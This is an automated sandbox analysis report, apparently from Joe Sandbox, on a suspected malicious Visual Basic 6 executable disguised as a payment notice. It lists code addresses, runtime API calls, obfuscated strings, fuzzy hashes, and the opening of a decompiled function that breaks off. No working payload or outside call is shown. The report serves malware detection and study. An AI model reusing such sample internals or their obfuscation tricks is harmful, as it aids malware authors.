0x0041d68e
0x0041d692
0x0041d693
0x0041d695
0x0041d6a0
0x0041d6a4
0x0041d6a8
0x0041d6a9
0x0041d6ab
0x0041d6b0
0x0041d6b9
0x0041d6c7
0x0041d6cd
0x0041d6db
0x0041d6f8
0x0041d6dd
0x0041d6dd
0x0041d6e2
0x0041d6e7
0x0041d6ec
0x0041d6ec
0x0041d71c
0x0041d720
0x0041d725
0x0041d73d
0x0041d740
0x0041d742
0x0041d74f
0x0041d771
0x0041d751
0x0041d751
0x0041d753
0x0041d758
0x0041d75e
0x0041d764
0x0041d769
0x0041d769
0x0041d77b
0x0041d781
0x0041d78b
0x0041d791
0x0041d79b
0x0041d79d
0x0041d7a8
0x0041d7af
0x0041d7b0
0x0041d7bb
0x0041d7c2
0x0041d7c3
0x0041d7ce
0x0041d7d2
0x0041d7d3
0x0041d7db
0x0041d7e6
0x0041d7ed
0x0041d7ee
0x0041d7f0
0x0041d7f5
0x0041d7f8
0x0041d7ff
0x0041d801
0x0041d801
0x0041d6c7
0x0041d806
0x0041d80d
0x0041d812
0x0041d817
0x0041d825
0x0041d842
0x0041d827
0x0041d827
0x0041d82c
0x0041d831
0x0041d836
0x0041d836
0x0041d866
0x0041d86a
0x0041d86f
0x0041d88a
0x0041d890
0x0041d892
0x0041d89f
0x0041d8c4
0x0041d8a1
0x0041d8a1
0x0041d8a6
0x0041d8ab
0x0041d8b1
0x0041d8b7
0x0041d8bc
0x0041d8bc
0x0041d8d2
0x0041d8ef
0x0041d8d4
0x0041d8d4
0x0041d8d9
0x0041d8de
0x0041d8e3
0x0041d8e3
0x0041d913
0x0041d917
0x0041d91c
0x0041d937
0x0041d93d
0x0041d93f
0x0041d94c
0x0041d971
0x0041d94e
0x0041d94e
0x0041d953
0x0041d958
0x0041d95e
0x0041d964
0x0041d969
0x0041d969
0x0041d97f
0x0041d99c
0x0041d981
0x0041d981
0x0041d986
0x0041d98b
0x0041d990
0x0041d990
0x0041d9c0
0x0041d9c4
0x0041d9c9
0x0041d9e4
0x0041d9ea
0x0041d9ec
0x0041d9f9
0x0041da1e
0x0041d9fb
0x0041d9fb
0x0041da00
0x0041da05
0x0041da0b
0x0041da11
0x0041da16
0x0041da16
0x0041da2c
0x0041da3a
0x0041da41
0x0041da52
0x0041da59
0x0041da8d
0x0041da96
0x0041da9a
0x0041da9e
0x0041da9f
0x0041daa1
0x0041daa9
0x0041dab7
0x0041dad4
0x0041dab9
0x0041dab9
0x0041dabe
0x0041dac3
0x0041dac8
0x0041dac8
0x0041daf8
0x0041dafc
0x0041db01
0x0041db1c
0x0041db22
0x0041db24
0x0041db31
0x0041db56
0x0041db33
0x0041db33
0x0041db38
0x0041db3d
0x0041db43
0x0041db49
0x0041db4e
0x0041db4e
0x0041db5d
0x0041db7c
0x0041db85
0x0041db8a
0x0041db99
0x0041db9e
0x0041dbc0
0x0041dbc6
0x0041dbd3
0x0041dbf5
0x0041dbd5
0x0041dbd5
0x0041dbda
0x0041dbdf
0x0041dbe2
0x0041dbe8
0x0041dbed
0x0041dbed
0x0041dbff
0x0041dc04
0x0041dc12
0x0041dc2f
0x0041dc14
0x0041dc14
0x0041dc19
0x0041dc1e
0x0041dc23
0x0041dc23
0x0041dc53
0x0041dc57
0x0041dc5c
0x0041dc77
0x0041dc7a
0x0041dc7c
0x0041dc89
0x0041dcab
0x0041dc8b
0x0041dc8b
0x0041dc8d
0x0041dc92
0x0041dc98
0x0041dc9e
0x0041dca3
0x0041dca3
0x0041dcb9
0x0041dcd6
0x0041dcbb
0x0041dcbb
0x0041dcc0
0x0041dcc5
0x0041dcca
0x0041dcca
0x0041dcfa
0x0041dcfe
0x0041dd03
0x0041dd1b
0x0041dd21
0x0041dd23
0x0041dd30
0x0041dd55
0x0041dd32
0x0041dd32
0x0041dd37
0x0041dd3c
0x0041dd42
0x0041dd48
0x0041dd4d
0x0041dd4d
0x0041dd63
0x0041dd80
0x0041dd65
0x0041dd65
0x0041dd6a
0x0041dd6f
0x0041dd74
0x0041dd74
0x0041dda4
0x0041dda8
0x0041ddad
0x0041ddc8
0x0041ddce
0x0041ddd0
0x0041dddd
0x0041de02
0x0041dddf
0x0041dddf
0x0041dde4
0x0041dde9
0x0041ddef
0x0041ddf5
0x0041ddfa
0x0041ddfa
0x0041de0f
0x0041de34
0x0041de41
0x0041de48
0x0041de5b
0x0041de63
0x0041de79
0x0041de7f
0x0041de8c
0x0041deae
0x0041de8e
0x0041de8e
0x0041de93
0x0041de98
0x0041de9b
0x0041dea1
0x0041dea6
0x0041dea6
0x0041debb
0x0041debe
0x0041decc
0x0041dee9
0x0041dece
0x0041dece
0x0041ded3
0x0041ded8
0x0041dedd
0x0041dedd
0x0041df0d
0x0041df11
0x0041df16
0x0041df2e
0x0041df31
0x0041df33
0x0041df40
0x0041df62
0x0041df42
0x0041df42
0x0041df44
0x0041df49
0x0041df4f
0x0041df55
0x0041df5a
0x0041df5a
0x0041df70
0x0041df8d
0x0041df72
0x0041df72
0x0041df77
0x0041df7c
0x0041df81
0x0041df81
0x0041dfb1
0x0041dfb5
0x0041dfba
0x0041dfd5
0x0041dfdb
0x0041dfdd
0x0041dfea
0x0041e00f
0x0041dfec
0x0041dfec
0x0041dff1
0x0041dff6
0x0041dffc
0x0041e002
0x0041e007
0x0041e007
0x0041e01d
0x0041e027
0x0041e02d
0x0041e03a
0x0041e03f
0x0041e071
0x0041e07a
0x0041e080
0x0041e08d
0x0041e095
0x0041e09d
0x0041e0a1
0x0041e0a2
0x0041e0a4
0x0041e0ac
0x0041e0ba
0x0041e0d7
0x0041e0bc
0x0041e0bc
0x0041e0c1
0x0041e0c6
0x0041e0cb
0x0041e0cb
0x0041e0fb
0x0041e0ff
0x0041e104
0x0041e11c
0x0041e122
0x0041e124
0x0041e131
0x0041e156
0x0041e133
0x0041e133
0x0041e138
0x0041e13d
0x0041e143
0x0041e149
0x0041e14e
0x0041e14e
0x0041e15d
0x0041e15f
0x0041e161
0x0041e16a
0x0041e16b
0x0041e17a
0x0041e197
0x0041e17c
0x0041e17c
0x0041e181
0x0041e186
0x0041e18b
0x0041e18b
0x0041e1bb
0x0041e1bf
0x0041e1c4
0x0041e1dc
0x0041e1e2
0x0041e1e4
0x0041e1f1
0x0041e216
0x0041e1f3
0x0041e1f3
0x0041e1f8
0x0041e1fd
0x0041e203
0x0041e209
0x0041e20e
0x0041e20e
0x0041e224
0x0041e241
0x0041e226
0x0041e226
0x0041e22b
0x0041e230
0x0041e235
0x0041e235
0x0041e265
0x0041e26c
0x0041e271
0x0041e28c
0x0041e292
0x0041e294
0x0041e2a1
0x0041e2c6
0x0041e2a3
0x0041e2a3
0x0041e2a8
0x0041e2ad
0x0041e2b3
0x0041e2b9
0x0041e2be
0x0041e2be
0x0041e2d0
0x0041e2d6
0x0041e2e3
0x0041e2ef
0x0041e2f9
0x0041e31d
0x0041e326
0x0041e32c
0x0041e339
0x0041e341
0x0041e345
0x0041e346
0x0041e348
0x0041e353
0x0041e35a
0x0041e35e
0x0041e362
0x0041e363
0x0041e365
0x0041e373
0x0041e378
0x0041e386
0x0041e3a3
0x0041e388
0x0041e388
0x0041e38d
0x0041e392
0x0041e397
0x0041e397
0x0041e3c7
0x0041e3cb
0x0041e3d0
0x0041e3eb
0x0041e3f1
0x0041e3f3
0x0041e400
0x0041e425
0x0041e402
0x0041e402
0x0041e407
0x0041e40c
0x0041e412
0x0041e418
0x0041e41d
0x0041e41d
0x0041e433
0x0041e450
0x0041e435
0x0041e435
0x0041e43a
0x0041e43f
0x0041e444
0x0041e444
0x0041e474
0x0041e478
0x0041e47d
0x0041e498
0x0041e49e
0x0041e4a0
0x0041e4ad
0x0041e4d2
0x0041e4af
0x0041e4af
0x0041e4b4
0x0041e4b9
0x0041e4bf
0x0041e4c5
0x0041e4ca
0x0041e4ca
0x0041e4e0
0x0041e4ed
0x0041e515
0x0041e51b
0x0041e528
0x0041e54a
0x0041e52a
0x0041e52a
0x0041e52f
0x0041e534
0x0041e537
0x0041e53d
0x0041e542
0x0041e542
0x0041e557
0x0041e55d
0x0041e561
0x0041e562
0x0041e564
0x0041e56c
0x0041e57a
0x0041e597
0x0041e57c
0x0041e57c
0x0041e581
0x0041e586
0x0041e58b
0x0041e58b
0x0041e5bb
0x0041e5bf
0x0041e5c4
0x0041e5df
0x0041e5e5
0x0041e5e7
0x0041e5f4
0x0041e619
0x0041e5f6
0x0041e5f6
0x0041e5fb
0x0041e600
0x0041e606
0x0041e60c
0x0041e611
0x0041e611
0x0041e627
0x0041e644
0x0041e629
0x0041e629
0x0041e62e
0x0041e633
0x0041e638
0x0041e638
0x0041e668
0x0041e66c
0x0041e671
0x0041e689
0x0041e68f
0x0041e691
0x0041e69e
0x0041e6c3
0x0041e6a0
0x0041e6a0
0x0041e6a5
0x0041e6aa
0x0041e6b0
0x0041e6b6
0x0041e6bb
0x0041e6bb
0x0041e6ca
0x0041e6cc
0x0041e6ce
0x0041e6d7
0x0041e6d8
0x0041e6e7
0x0041e704
0x0041e6e9
0x0041e6e9
0x0041e6ee
0x0041e6f3
0x0041e6f8
0x0041e6f8
0x0041e728
0x0041e72f
0x0041e734
0x0041e74f
0x0041e755
0x0041e757
0x0041e764
0x0041e789
0x0041e766
0x0041e766
0x0041e76b
0x0041e770
0x0041e776
0x0041e77c
0x0041e781
0x0041e781
0x0041e797
0x0041e7b4
0x0041e799
0x0041e799
0x0041e79e
0x0041e7a3
0x0041e7a8
0x0041e7a8
0x0041e7d8
0x0041e7df
0x0041e7e4
0x0041e7ff
0x0041e805
0x0041e807
0x0041e814
0x0041e839
0x0041e816
0x0041e816
0x0041e81b
0x0041e820
0x0041e826
0x0041e82c
0x0041e831
0x0041e831
0x0041e847
0x0041e854
0x0041e867
0x0041e86e
0x0041e888
0x0041e891
0x0041e898
0x0041e89f
0x0041e8a3
0x0041e8a7
0x0041e8a8
0x0041e8aa
0x0041e8b8
0x0041e8bd
0x0041e8cb
0x0041e8e8
0x0041e8cd
0x0041e8cd
0x0041e8d2
0x0041e8d7
0x0041e8dc
0x0041e8dc
0x0041e90c
0x0041e910
0x0041e915
0x0041e92d
0x0041e933
0x0041e935
0x0041e942
0x0041e967
0x0041e944
0x0041e944
0x0041e949
0x0041e94e
0x0041e954
0x0041e95a
0x0041e95f
0x0041e95f
0x0041e97c
0x0041e98c
0x0041e991
0x0041e99a
0x0041e9b4
0x0041e9bb
0x0041e9c5
0x0041e9e6
0x0041e9f3
0x0041e9fa
0x0041e9fe
0x0041e9ff
0x0041ea01
0x0041ea0c
0x0041ea10
0x0041ea11
0x0041ea13
0x0041ea21
0x0041ea26
0x0041ea34
0x0041ea51
0x0041ea36
0x0041ea36
0x0041ea3b
0x0041ea40
0x0041ea45
0x0041ea45
0x0041ea75
0x0041ea79
0x0041ea7e
0x0041ea99
0x0041ea9f
0x0041eaa1
0x0041eaae
0x0041ead3
0x0041eab0
0x0041eab0
0x0041eab5
0x0041eaba
0x0041eac0
0x0041eac6
0x0041eacb
0x0041eacb
0x0041eae1
0x0041eaf0
0x0041eafd
0x0041eb28
0x0041eb2e
0x0041eb3b
0x0041eb5d
0x0041eb3d
0x0041eb3d
0x0041eb42
0x0041eb47
0x0041eb4a
0x0041eb50
0x0041eb55
0x0041eb55
0x0041eb6e
0x0041eb79
0x0041eb7e
0x0041eb94
0x0041eb9a
0x0041eba7
0x0041ebc9
0x0041eba9
0x0041eba9
0x0041ebae
0x0041ebb3
0x0041ebb6
0x0041ebbc
0x0041ebc1
0x0041ebc1
0x0041ebd6
0x0041ebdb
0x0041ebe2
0x0041ec51
0x0041ec59
0x0041ec61
0x0041ec69
0x0041ec71
0x0041ec72
0x0041ec74
0x0041ec79
0x0041ec7c
0x0041ec7d
0x0041ec7f
0x0041ec87
0x0041ec8f
0x0041ec97
0x0041ec9c

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041CE02
#692.MSVBVM60(?,Unecliptic9,Bovlamme1,?,?,?,?,00401356), ref: 0041CE57
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041CE7E
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041CE90
__vbaNew2.MSVBVM60(00403C70,004223FC,00008008,?), ref: 0041CEBE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 0041CF20
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,00000108), ref: 0041CF7F
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,00000108), ref: 0041CFA1
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041CFC0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CFF9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000158), ref: 0041D043
#618.MSVBVM60(?,00000087), ref: 0041D05F
__vbaStrMove.MSVBVM60(?,00000087), ref: 0041D069
__vbaFreeStr.MSVBVM60(?,00000087), ref: 0041D071
__vbaFreeObj.MSVBVM60(?,00000087), ref: 0041D079
#711.MSVBVM60(?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0B0
__vbaAryVar.MSVBVM60(00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0C1
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0D7
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,Tosdede8,0000000A,000000FF,00000000,00008008,?), ref: 0041D0EC
__vbaSetSystemError.MSVBVM60(?,?,00401356), ref: 0041D106
#517.MSVBVM60(phrontisterium), ref: 0041D127
__vbaStrMove.MSVBVM60(phrontisterium), ref: 0041D131
__vbaNew2.MSVBVM60(00403270,00422010,phrontisterium), ref: 0041D150
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D189
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000048), ref: 0041D1CD
#712.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1F4
__vbaStrMove.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D1FE
__vbaFreeStr.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D206
__vbaFreeObj.MSVBVM60(STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D20E
__vbaNew2.MSVBVM60(00403270,00422010,STYRETABELLER,?,Calelectricity,00000001,000000FF,00000000), ref: 0041D22D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D266
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000A0), ref: 0041D2B0
__vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D2CB
__vbaStrToAnsi.MSVBVM60(?,Tvivlsomst9,00000000,?,?), ref: 0041D2DA
__vbaSetSystemError.MSVBVM60(00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D2EB
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Tvivlsomst9,00000000,?,?), ref: 0041D316
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041D321
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041D34F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D388
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000050), ref: 0041D3CC
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D3F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D42C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000170), ref: 0041D476
__vbaStrCat.MSVBVM60(?,?), ref: 0041D490
__vbaStrMove.MSVBVM60(?,?), ref: 0041D49A
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?), ref: 0041D4A9
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4BB
__vbaPrintObj.MSVBVM60(00403D50,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D4D6
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041D4F8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D531
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000110), ref: 0041D57B
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D5A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D5DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000100), ref: 0041D625
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041D647
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D650
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D65D
__vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041D66E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D695
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,00000000,00000000), ref: 0041D6AB
__vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 0041D6B9
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,00000000,00000000), ref: 0041D6E7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D720
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000048), ref: 0041D764
#717.MSVBVM60(?,00000008,00000080,00000000), ref: 0041D7B0
__vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000), ref: 0041D7C3
__vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7D3
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7DB
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000), ref: 0041D7F0
__vbaOnError.MSVBVM60(000000FF), ref: 0041D801
__vbaSetSystemError.MSVBVM60(000000FF), ref: 0041D812
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D831
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D86A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001E8), ref: 0041D8B7
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D8DE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D917
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001F0), ref: 0041D964
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041D98B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D9C4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000E0), ref: 0041DA11
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DAA1
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,00401356), ref: 0041DAC3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DAFC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000120), ref: 0041DB49
__vbaFreeObj.MSVBVM60 ref: 0041DB85
__vbaStrCopy.MSVBVM60 ref: 0041DB99
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403924,000006F8), ref: 0041DBE8
__vbaFreeStr.MSVBVM60(00000000,?,00403924,000006F8), ref: 0041DBFF
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DC1E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DC57
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C90,00000060), ref: 0041DC9E
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DCC5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DCFE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000110), ref: 0041DD48
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DD6F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DDA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000120), ref: 0041DDF5
__vbaFreeStr.MSVBVM60 ref: 0041DE48
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041DE5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403924,000006FC), ref: 0041DEA1
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DED8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF11
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CFC,00000048), ref: 0041DF55
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041DF7C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041DFB5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000F8), ref: 0041E002
__vbaStrMove.MSVBVM60(00000000,?,00403C90,000000F8), ref: 0041E03A
__vbaStrMove.MSVBVM60 ref: 0041E08D
__vbaFreeStr.MSVBVM60 ref: 0041E095
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E0A4
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401356), ref: 0041E0C6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E0FF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000130), ref: 0041E149
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E16B
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E186
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E1BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001E0), ref: 0041E209
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E230
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E26C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000140), ref: 0041E2B9
__vbaStrMove.MSVBVM60(00000000,?,00403CFC,00000140), ref: 0041E2E3
__vbaStrVarMove.MSVBVM60(?), ref: 0041E2EF
__vbaStrMove.MSVBVM60(?), ref: 0041E2F9
__vbaStrMove.MSVBVM60 ref: 0041E339
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E348
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041E365
__vbaFreeVar.MSVBVM60 ref: 0041E373
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E392
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E3CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000120), ref: 0041E418
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E43F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E478
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000140), ref: 0041E4C5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403924,00000700), ref: 0041E53D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041E564
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E586
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E5BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000180), ref: 0041E60C
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E633
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E66C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000160), ref: 0041E6B6
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E6D8
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E6F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E72F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000108), ref: 0041E77C
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E7A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E7DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000D8), ref: 0041E82C
__vbaI4Var.MSVBVM60(?,?,?), ref: 0041E86E
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041E8AA
__vbaFreeVar.MSVBVM60 ref: 0041E8B8
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041E8D7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041E910
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000130), ref: 0041E95A
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041E97C
__vbaStrCopy.MSVBVM60 ref: 0041E98C
__vbaStrVarMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E9BB
__vbaStrMove.MSVBVM60(?,00006FEE,?,?), ref: 0041E9C5
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EA01
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041EA13
__vbaFreeVar.MSVBVM60 ref: 0041EA21
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041EA40
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EA79
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041EAC6
__vbaStrCopy.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041EAF0
__vbaStrCopy.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041EAFD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403924,00000704), ref: 0041EB50
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041EB6E
__vbaFreeObj.MSVBVM60 ref: 0041EB79
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403924,00000708), ref: 0041EBBC
__vbaFreeVar.MSVBVM60(00000000,?,00403924,00000708), ref: 0041EBD6
__vbaFreeStr.MSVBVM60(0041EC9D), ref: 0041EC51
__vbaFreeStr.MSVBVM60(0041EC9D), ref: 0041EC59
__vbaFreeStr.MSVBVM60(0041EC9D), ref: 0041EC61
__vbaFreeStr.MSVBVM60(0041EC9D), ref: 0041EC69
__vbaAryDestruct.MSVBVM60(00000000,?,0041EC9D), ref: 0041EC74
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0041EC9D), ref: 0041EC7F
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EC9D), ref: 0041EC87
__vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0041EC9D), ref: 0041EC8F
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041EC9D), ref: 0041EC97

Strings

Hvepsetaljer, xrefs: 0041E501
Zombie3, xrefs: 0041EAE8
phrontisterium, xrefs: 0041D122
Tvivlsomst9, xrefs: 0041D2D1
Koaguleringerne7, xrefs: 0041E04D
Calelectricity, xrefs: 0041D1E7
Unecliptic9, xrefs: 0041CE4B
INDUSTRIALIZING, xrefs: 0041E984
T, xrefs: 0041DA59
STYRETABELLER, xrefs: 0041D1EF
Tosdede8, xrefs: 0041D0A4
2, xrefs: 0041E03F
Apparat5, xrefs: 0041EAF5
Bakteriers, xrefs: 0041DB91
Bovlamme1, xrefs: 0041CE46
stivstikkere, xrefs: 0041CE5C

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$List$Move$CopyError$CallLateSystem$Ansi$Destruct$#517#618#692#711#712#717ChkstkPrintVar2
String ID: 2$Apparat5$Bakteriers$Bovlamme1$Calelectricity$Hvepsetaljer$INDUSTRIALIZING$Koaguleringerne7$STYRETABELLER$Tosdede8$Tvivlsomst9$Unecliptic9$Zombie3$phrontisterium$stivstikkere$T
API String ID: 2704859531-1304991006
Opcode ID: 59bd3ff2d14876b7e91bd63472173e348f1644dc9da050e389e6ad90ff56124b
Instruction ID: aeed08f8429a12a75c291342dec47684a2fbe53c84e921dba84e78ea33b86e80
Opcode Fuzzy Hash: 59bd3ff2d14876b7e91bd63472173e348f1644dc9da050e389e6ad90ff56124b
Instruction Fuzzy Hash: F603E771940229AFDB20DF50CC45FDDB7B9BB08304F1044EAE50ABB2A1DB795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0ED, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0041F0ED(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				short* _v36;
				char _v48;
				void* _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				char* _t170;
				signed int _t174;
				char* _t179;
				signed int _t183;
				char* _t188;
				signed int _t192;
				signed int _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				char* _t210;
				signed int _t214;
				signed int _t215;
				char* _t220;
				signed int _t224;
				signed int _t225;
				char* _t230;
				signed int _t234;
				char* _t237;
				intOrPtr _t286;

				_push(0x401356);
				_push( *[fs:0x0]);
